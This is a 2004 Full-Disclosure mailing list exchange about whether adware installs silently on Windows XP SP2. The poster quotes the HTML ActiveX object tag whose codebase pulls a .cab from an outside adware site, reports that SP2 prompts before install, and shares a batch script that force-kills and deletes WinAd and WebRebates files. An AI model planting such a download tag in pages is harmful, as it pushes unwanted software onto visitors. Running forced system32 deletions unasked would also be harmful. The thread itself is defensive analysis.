RE: Spyware installs ... XP SP2 box

["Castigliola, Angelo" <ACastigliola () unumprovident com>]

Thank you for the test Raize. I appreciate your time.

> One must assume that you are installing these "theme packs" via some
BHO (Browser Helper Object) that you
> installed previously or put the site on the "Always trust content from
this provider". Perhaps someone 
> else can explain where I am missing the exploit, because a quick glance
over seems to indicate there is 
> none for XP SP2. (I did not test this on SP1)

I think you are right. It seems the only person that was not prompted
for the install that was not running SP2 was the original author of this
thread who said that it was a previously visited site.

As far as users running SP1 there is no security warning that says an
executable is about to be installed. There is no Microsoft Update that
will prevent this from loading. Like most large organizations just
jumping to SP2 is not an option. It needs go though rigorous testing to
make sure it complies with all of our internal software.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of raize
Sent: Tuesday, October 05, 2004 9:29 AM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Spyware installs ... XP SP2 box


The installed code is definitely:

<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0></object>

However, there is no exploit here. I loaded this with a default honeypot
image of XPSP2 with IE as an Admin and nothing else installed other than
the drop down that asked me if I really wanted to trust this site for
installing an executable.

One must assume that you are installing these "theme packs" via some BHO
(Browser Helper Object) that you installed previously or put the site on
the "Always trust content from this provider". Perhaps someone else can
explain where I am missing the exploit, because a quick glance over
seems to indicate there is none for XP SP2. (I did not test this on SP1)

Spybot and Ad-aware do not catch and kill WinRebates and WinAd
spy/adware properly, but I have a batch command that will do it for you.
Included is a .zip of each IP contacted along with full URL request and
output. It also contains the contents of this email and the batch file
with these commands: (You'll want to rename the .txt to .bat)

--------------------------------------------
cd "C:\Program Files\Winad Client"
taskkill /T /F /IM WinClt.exe
taskkill /T /F /IM WinAd.exe
erase WinClt.exe
erase WinAd.exe
cd ..
cd Web_Rebates
taskkill /T /F /IM WebRebates0.exe
taskkill /T /F /IM WebRebates1.exe
erase WebRebates0.exe
erase WebRebates1.exe
cd ..
rd /Q /S "Winad Client"
rd /Q /S "Web_Rebates"
cd "C:\Windows\system32"
taskkill /T /F /IM fjdria.exe
taskkill /T /F /IM ezSP_Px.exe
erase fjdria.exe
erase ezSP_Px.exe

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html